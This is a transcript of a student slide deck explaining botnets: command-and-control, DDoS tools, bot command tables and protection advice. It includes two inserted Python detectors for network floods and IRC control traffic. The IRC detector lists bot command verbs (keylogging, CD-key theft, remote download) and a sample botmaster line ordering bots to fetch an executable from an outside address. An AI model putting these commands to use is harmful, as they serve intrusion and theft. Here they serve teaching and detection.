botnet

© ARAGAS

Upload: arjo-ghosh

Post on 19-Jul-2015

TRANSCRIPT


BOTNET BATTLE

A single compromised computer can be a pain to deal with, but a collection of compromised computers can wreak havoc around the world.

Leaving our computer vulnerable to attack makes us a danger, not just to ourselves but to everyone on the internet.

How do botnets work?

What's the risk?

How can we protect ourselves?

WHAT IS A BOTNET?

The term bot is short for robot.

Criminals distribute malware that turns our computer into a bot.

The bot then performs automated tasks over the internet without our knowledge.

Criminals use bots to infect a large number of computers.

These infected computers form a network, popularly called a botnet.

RISKS OF BOTNET

Criminals use botnets to

Send out spam email messages.

Spread viruses.

Attack computers + servers.

Commit other kinds of crime + fraud.

If our computer becomes part of a botnet, it might slow down, and we would be helping cyber criminals without knowing it.

DEBUTS IN 2000

In the year 2000, a Canadian teenager launched a series of distributed denial-of-service attacks against several high-profile web sites.

The teen targeted Yahoo, Dell, eBay, Amazon and many others by flooding the sites with massive amounts of junk traffic until the sites went down.

BOTNETS CLASSIFICATION

Botnets can be classified into two prime categories:

Legal botnets

Illegal botnets


LEGAL BOTNETS

The term botnet was originally used for several IRC bots linked together so that they could set channel modes on other bots and users and keep IRC channels free from unwanted users.

This is where the term comes from: the first illegal botnets were built the same way as these legal ones.

A common bot used to set up botnets on IRC is Eggdrop.

ILLEGAL BOTNETS

Illegal botnets are made of computers whose security defences have been breached and whose control has been handed to a third party.

Each such infected device, known as a "bot", is created when a computer is penetrated by software from a malware distribution.

The botmaster directs the activities of these infected computers through communication channels, typically IRC or HTTP.

WHAT IS A BOT?

A "bot" is a type of malware that allows an attacker to take control over an affected computer.

Bots are usually part of a network of infected machines.

Since a bot-infected computer does the bidding of its master, many people refer to these victim machines as zombies.

The cybercriminals that control these bots are called botmasters.

BOT + EXPLOIT SELECTION

Botnets typically begin when the botmaster downloads a bot program and exploit code.

Bot programs such as Agobot, IRCBot, etc. are freely available on the internet.

Exploits for Windows OS are generally selected.

These exploits are attractive both because of the large number of exploits available and because of the widespread adoption of Windows among business + residential users.

CONTROL CHANNEL

After selecting the bot + exploit combination, the botmaster must set up one or more control channels.

The most common technique is to use public IRC servers to control the botnet.

The botmaster needs a control channel in order to issue commands to and receive feedback from the botnet.

Control channels are frequently moved to avoid detection.

INITIAL INFECTION

The botmaster must now begin to build the zombie army that will make up the botnet.

Using the chosen exploit, the botmaster compromises and takes control of a handful of systems.

COMMAND AND CONTROL (C + C) MECHANISM

A collection of computers is useless without some control mechanism.

The command and control (C&C) infrastructure constitutes the interface between the botnet and the botmaster.

The botmaster commands the C&C.

The C&C commands the bots.

BOTNET WITH ZOMBIES


BOTNET STATISTICS


DOSNET

A type of botnet; the term is mostly used for malicious botnets.

DoSnets are used for DDoS attacks, which can be very devastating.

Well-known DoSnet software includes

→ TFN2k

→ Stacheldraht

→ Trinoo
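What separates a DoSnet flood from one noisy host is the number of sources that converge on a single target. The script below is an added example, not code from the original deck: it aggregates flow records per destination and time window and reports a distributed flood only when both the packet rate and the number of distinct sources are high, listing a single loud host separately. The flow lines are constructed inside the code (a simplified "timestamp src dst dport packets" layout; NetFlow/IPFIX exports or Zeek conn.log carry the same fields under other names), the addresses are documentation/private ranges, and the thresholds are illustrative assumptions.

```python
from collections import defaultdict


def parse_flow(line):
    """Parse one constructed flow record: 'epoch_seconds src_ip dst_ip dst_port packets'."""
    ts, src, dst, dport, pkts = line.split()
    return int(ts), src, dst, int(dport), int(pkts)


def aggregate(lines, window):
    """Sum packets and collect distinct sources per (dst, dport, window index)."""
    buckets = defaultdict(lambda: {"packets": 0, "sources": set()})
    for line in lines:
        ts, src, dst, dport, pkts = parse_flow(line)
        b = buckets[(dst, dport, ts // window)]
        b["packets"] += pkts
        b["sources"].add(src)
    return buckets


def detect_floods(lines, window=10, min_sources=20, min_pps=1000):
    """Return (ddos, dos); each entry is (dst, dport, window_start, n_sources, pps).
    A flood counts as distributed (DoSnet-style) only when many distinct sources
    contribute; one source at a high rate is listed under dos instead."""
    ddos, dos = [], []
    for (dst, dport, w), b in aggregate(lines, window).items():
        pps = b["packets"] / window
        n_src = len(b["sources"])
        if pps < min_pps:
            continue
        entry = (dst, dport, w * window, n_src, pps)
        (ddos if n_src >= min_sources else dos).append(entry)
    return sorted(ddos), sorted(dos)


def build_sample():
    """Constructed flows: light normal traffic, a 40-host flood, and one loud scanner."""
    t0 = 1437300000  # 19 Jul 2015 UTC, arbitrary
    lines = []
    for t in range(20):  # five ordinary clients fetching pages
        lines.append(f"{t0 + t} 192.0.2.{t % 5 + 1} 203.0.113.10 80 {3 + t % 4}")
    for t in range(10, 20):  # 40 zombies, 500 packets/s each, for 10 s
        for z in range(40):
            lines.append(f"{t0 + t} 10.0.{z}.77 203.0.113.10 80 500")
    for t in range(10):  # one host hammering SSH: a DoS, not a botnet
        lines.append(f"{t0 + t} 198.51.100.9 203.0.113.20 22 3000")
    return lines


if __name__ == "__main__":
    ddos, dos = detect_floods(build_sample())
    for dst, dport, start, n_src, pps in ddos:
        print(f"DDoS on {dst}:{dport} from {start}: {n_src} sources, {pps:.0f} pkt/s")
    for dst, dport, start, n_src, pps in dos:
        print(f"single-source DoS on {dst}:{dport} from {start}: {pps:.0f} pkt/s")
```

The two-threshold rule matters in practice: rate alone flags a misconfigured monitor or a port scan as an "attack", while the source count alone is fooled by ordinary popularity spikes. Tune window, min_sources and min_pps to the baseline of the link being watched.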

DOSBOT

The denial of service bot is the client used to connect to the network.

It is also the software that performs the attacks.

The vast majority of the bots are written in

→ C

→ C++

→ Java

WAREZ

Botnets can be used to steal, store, or propagate warez.

Warez is any illegally obtained or pirated software.

Bots can search hard drives for software and licences installed on a victim's machine.

Botmasters can easily transfer them off for duplication and distribution.

CONTROLLING BOTNET

Some of the botnet commands from the Win32 bot family:

Command      Function
.capture     Generates and saves an image or video file.
.download    Downloads a file from a specified URL to the victim's computer.
.findfile    Finds files on the victim's computer by name and returns the paths of any files found.
.getcdkeys   Returns product keys for software installed on the victim's computer.
.keylog      Logs the victim's keystrokes and saves them to a file.
.open        Opens a program, an image, or a URL in a web browser.
.procs       Lists the processes running on the victim's computer.
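The control channel slide and the command table above together describe what an IRC-based C&C session looks like on the wire: the botmaster speaks in a channel and the bots answer. The detector below is an added example, not code from the original deck. It parses IRC lines the way a network sensor would log them and flags PRIVMSG traffic whose first word is one of the Win32 bot-family verbs in the table, then reports channels that carried more than one such command. The log lines, nicknames, channel name, file name and addresses are constructed for the example.

```python
import re
from collections import Counter

# Command verbs from the "Controlling botnet" table above (Win32 bot family).
BOT_COMMANDS = {
    ".capture", ".download", ".findfile", ".getcdkeys",
    ".keylog", ".open", ".procs",
}

# RFC 1459 line: [":" prefix " "] command [" " params] [" :" trailing]
IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<command>\S+)"
    r"(?: (?P<params>[^:]*?))?(?: :(?P<trailing>.*))?$"
)


def parse_irc(line):
    """Split one IRC line into (prefix, COMMAND, [params], trailing); None if unparseable."""
    m = IRC_RE.match(line.strip())
    if not m:
        return None
    params = m.group("params").split() if m.group("params") else []
    return m.group("prefix"), m.group("command").upper(), params, m.group("trailing")


def flag_bot_commands(lines):
    """Return (target, sender_nick, verb, argument) for every PRIVMSG whose
    text starts with a known bot command verb."""
    hits = []
    for line in lines:
        parsed = parse_irc(line)
        if parsed is None:
            continue
        prefix, command, params, trailing = parsed
        if command != "PRIVMSG" or not params or not trailing:
            continue
        verb, _, argument = trailing.partition(" ")
        if verb.lower() in BOT_COMMANDS:
            nick = prefix.split("!", 1)[0] if prefix else "?"
            hits.append((params[0], nick, verb.lower(), argument))
    return hits


def suspected_control_channels(hits, min_hits=2):
    """Targets that carried at least min_hits bot commands: one hit may be chatter
    that happens to start with a dot, repeated ones rarely are."""
    counts = Counter(target for target, _, _, _ in hits)
    return {chan: n for chan, n in counts.items() if n >= min_hits}


# Constructed sensor log for the example; not captured traffic.
SAMPLE_LOG = [
    ":irc.example.net 001 zombie1 :Welcome to the network",
    ":zombie1!bot@10.0.0.5 JOIN #c0ntr0l",
    ":master!m@198.51.100.7 PRIVMSG #c0ntr0l :.download http://198.51.100.7/upd.exe",
    ":master!m@198.51.100.7 PRIVMSG #c0ntr0l :.keylog on",
    ":zombie1!bot@10.0.0.5 PRIVMSG #c0ntr0l :[KEYLOG]: started",
    ":master!m@198.51.100.7 PRIVMSG #c0ntr0l :.procs",
    ":alice!a@192.0.2.9 PRIVMSG #linux :anyone tried the new kernel?",
    "PING :irc.example.net",
]

if __name__ == "__main__":
    found = flag_bot_commands(SAMPLE_LOG)
    for target, nick, verb, arg in found:
        print(f"{target}: {nick} sent {verb} {arg}".rstrip())
    print("suspected control channels:", suspected_control_channels(found))
```

Matching on the verb at the start of the message text, rather than anywhere in the line, keeps ordinary conversation that mentions ".download" out of the alerts; the per-channel count then separates a control channel from a one-off false positive. Because control channels are moved often, the channel name itself is the least stable indicator and is deliberately not part of the rule.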

HOW BOTS WORK?

Bots creep into a person's computer in many ways.

Bots often spread themselves across the internet by looking for vulnerable, unprotected computers to infect.

When they find an exposed computer, they quickly infect the machine and then report back to their master.

Their goal is then to stay hidden until they are instructed to carry out a task.

AUTOMATED TASKS BY BOTS

Sending: they send

→ Spam

→ Viruses

→ Spyware

Stealing: they steal personal and private information and communicate it back to the malicious user:

→ Bank credentials

→ Credit card numbers

→ Sensitive information

Denial of service: launching denial of service (DoS) attacks against a specified target.

Click fraud: fraudsters use bots to boost web advertising billings by automatically clicking on internet ads.

PROTECT AGAINST BOTS

Limit your user rights when online: use a standard (non-administrator) account for everyday work.

Install top-rated security software.

Increase the security settings on your browser.

Apply the latest system patches; turn on automatic updates.

Configure your other software to update automatically.

Never open attachments unless you can verify the source.

DETECTION + REMOVAL 1

RUBOTTED 2.0 BETA

Protects our system by continuously monitoring our computer for potential infection and suspicious activities associated with bots.

→ downloadcenter.trendmicro.com

DETECTION + REMOVAL 2

MALICIOUS SOFTWARE REMOVAL TOOL

Checks our computer for infection by specific, prevalent malicious software and removes the infection if it is found.

Microsoft releases an updated version of this tool on the second Tuesday of each month.

→ microsoft.com

DETECTION + REMOVAL 3

NORTON™ POWER ERASER

Eliminates deeply embedded and difficult-to-remove crimeware that traditional virus scanning doesn't always detect.

Norton Power Eraser is specially designed to aggressively target scamware.

→ security.symantec.com

MOBILE BOTNETS

Mobile botnets target smartphones, attempting to gain complete access to the device and its contents and to hand control to the botmaster.

Mobile bots obtain admin rights on the compromised devices, enabling the attackers to

→ Send e-mail or text messages

→ Make phone calls

→ Access contacts and photos, and more.

EXAMPLES OF MOBILE BOTNETS

DroidDream, the malware that compromised Android devices.

The iPhone SMS attack that affected iPhone + iPad devices.

Commwarrior, which affected Symbian Series mobile devices.

Zitmo, which targeted BlackBerry users.

CONTROLLING MOBILE BOTNET

Some of the botnet commands from the iBot family:

Command                 Function
Add phone number(s)     Adds numbers to the forwarding list. Commands are forwarded to all bots on the list.
Set sleep interval      Sets how long the client waits before searching the P2P network for a command.
Execute shell sequence  Runs a command in the shell.
Download URL            Downloads a command file from the botmaster.

PROTECT AGAINST MOBILE BOTS

Install the latest official OS for your smartphone.

Avoid pirated apps or apps from untrusted sources.

Download apps only from trusted and reputable app stores.


DETECTION + REMOVAL

BULLGUARD MOBILE SECURITY 10

Detects and removes malware.

Monitor information that is being sent and received.

Remotely manage and monitor the smartphone.

→ bullguard.com


ANY QUESTIONS?


CREDITS

Alok Roy

Arjo Ghosh

Abhishek Sahu